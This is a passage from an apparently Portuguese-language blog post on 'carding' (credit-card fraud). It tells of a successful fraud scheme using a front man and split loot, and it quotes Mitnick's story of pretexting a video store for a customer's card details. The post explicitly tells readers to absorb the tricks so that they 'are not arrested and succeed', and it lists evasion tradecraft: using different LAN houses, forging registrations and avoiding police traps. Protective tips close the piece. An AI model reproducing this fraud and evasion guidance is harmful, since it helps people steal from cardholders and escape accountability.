casa. Na manhã seguinte, Erick pega as coisas em um carro, checa se nenhum pacote está grampeado e fica com tudo em sua casa. Nisso, a policia investiga a casa do laranja e como não há provas e não encontraram nada, eles são vitoriosos dessa vez. Luis ganha a sua tv de plasma, o grupo de Erick divide os "prêmios" entre eles. Erick envia os dados bancários para o amigo do seu primo e fatura seu playstation 3 que era a única coisa que ele queria com tudo isso. Mais uma vez, isso foi um exemplo de um ataque carder bem-sucedido. O que vale resaltar é que é importante que o leitor capite todas as "manhas" nos contos, para saber como não ser preso e ser bem sucedido em uma ação dessas. Caso 3: Pura engenharia social Essa não é uma história feita por mim, mas sim um historinha do famoso livro A arte de enganar de Kevin David Mitnick. Decidi assim porque essa história se encaixa perfeitamente no contexto de caso. Acompanhe. "Certa vez eu estava em um restaurante com Henry e seu pai. Durante a conversa, Henry repreendeu o pai por dar o número do seu cartão de crédito como quem dá o número do telefone. "É claro que você tem de dar o número do seu cartão quando compra alguma coisa", ele dizia. "Mas dá-lo em uma loja que arquiva o seu número em seus registros — isso é burrice." "O único lugar em que faço isso é na Studio Video", disse o Sr Conklin, referindo-se à mesma cadeia de locadoras de vídeo. "Mas verifico a minha fatura todos os meses. Eu percebo se eles começarem a aumentar a conta." "É claro", salientou Henry, "mas depois que eles têm o seu número, qualquer pessoa pode roubá-lo". "Você se refere a um funcionário desonesto?" "Não, qualquer pessoa e não apenas um funcionário." "Você está dizendo bobagens", retrucou o Sr. Conklin. "Posso ligar agora mesmo e fazer com que eles me dêem o número do seu cartão Visa", respondeu Henry. "Não, você não pode", afirmou o pai. "Posso fazer isso em cinco minutos, bem na sua frente sem nem ter de sair da mesa." O Sr. Conklin olhou firme, o olhar de alguém que se sentia seguro, mas que não queria mostrar isso. "Digo que você não sabe do que está falando", desafiou, tirando do bolso a carteira e jogando uma nota de 50 dólares na mesa. "Se fizer o que está dizendo, o dinheiro é seu." "Não quero o seu dinheiro pai", disse Henry. Ele pegou o telefone celular, perguntou ao pai qual era a loja e ligou para o Auxílio à Lista pedindo o número do telefone e também o número da loja na região de Sherman Oaks. Em seguida, ligou para a loja de Sherman Oaks. Usando mais ou menos a mesma abordagem descrita na história anterior, ele rapidamente conseguiu o nome do gerente e o número da loja. Ligou para a loja na qual o seu pai tinha a conta. Ele usou o velho truque de se fazer passar pelo gerente, deu o nome do gerente como o seu próprio e o número da loja que havia obtido. Tomou a usar o mesmo truque: "Os seus computadores estão funcionando hoje? Os nossos às vezes funcionam, às vezes não." Ouviu a resposta e continuou: "Bem, tenho um dos seus clientes aqui comigo e ele quer alugar um vídeo, mas os nossos computadores estão fora do ar agora. Preciso ver a conta do cliente e ter certeza de que ele é um cliente da sua loja." Henry deu o nome do seu pai. Em seguida, usando apenas uma pequena variação da técnica, pediu para ela ler as informações da conta: endereço, número de telefone e a data em que a conta foi aberta. Depois disse: "Ouça, estou com uma fila enorme de clientes aqui. Perigos do carding/banking Para o carder: Se o leitor analisou atentamente as técnicas descritas aqui, viu o trabalho que da não ser rastreado. Tendo que abrir um simples email, só em lan, tudo que for online não pode ser de casa. Além disso, ir em lans diferentes a cada vez, forjar cadastros, tomar cuidado com a policia federal e suas "armadilhas", escolher um tempo certo para "festejar o prêmio", etc. Um único deslize aqui, além de botar todo o plano por água abaixo, pode levar o carder a ser preso. Para a vítima: Bom, não há muito o que se dizer aqui. Se o ataque do carder for bem-sucedido, a vítima sofrerá um prejuízo financeiro tremendo, e até provar que ela não efetuo as comprar e alguém devolver o dinheiro dela, isso irá resultar em semanas de ódio, dor de cabeça e uma burocracia infernal com a policia, o procom, a loja, etc. O principal: Como se proteger de ataques e golpes fraudulentos. Bom, finalmente chegamos ao capítulo que vamos aprender a nos proteger. Vou mostrar de forma clara e rápida os cuidados a serem tomados para detectar e evitar um plano carder em ação: (1-) Cheque a url de um site muito bem antes de clicar nela. Como vimos, os detalhes de um domínio fake para um verdadeiro são extremamente minusiosos. (2-) Cheque a autenticidade de um email desconhecido antes de baixar anexos ou clicar em links estranhos. (3-) Desconfie de pessoas que ligam dizendo que são de alguma empresa famosa. Ligue para lá para confirmar a existência da pessoa. (4-) Ao fazer compras pela internet, e claro, após verificar se a página não é fake(veja atentamente seu código-fonte!), escolha a opção de pagar por boleto que é muito mais segura e não digite informações vitais em formulários de páginas suspeitas. (5-) Tente hackear o site usando as técnicas mostradas aqui antes de comprar algo por ele. Caso obtenha sucesso e acesse informações vitais de usuários. Nem pense em comprar algo por ele. Cheque também a segurança do roteador e se o site usa uma criptografia descente. (6-) Não clique em nada, não forneça nada e não execute comando algum em seu computador sem antes saber se aquela pessoa no telefone é realmente quem diz ser, se aquele email não veio de um servidor estranho, ou se aquela página web toda bonitinha não é algo fajuto para te enganar. Seja paranóico, pois nesse caso, a paranóia é a sua melhor amiga e também a sua segurança. (7-) Tenha em mente que o carder tenta se informar sobre a vítima, então é provável que um malware como um cavalo-de-tróia ou keylogger venha em algo que interesse a vítima e não apenas em forma de site comercial ou site de banco. Pode ser uma mensagem falando que o artista favorito dela morreu e manda clicar em link (com keylogger claro) para ver a matéria completa, pode vir em forma de um programa engraçado que desperte a curiosidade da vítima ingênua, etc. Ingenuidade é o que o carder explora, assim como os gostos e características das pessoas que eles querem atacar. Fiquem atentos! Abraço a todos ...Bons estudos!

carding

2009-01-24T12:05:00.000-08:00

download

2009-01-20T08:24:00.001-08:00

download

2008-12-20T07:40:00.000-08:00

the life must be crezy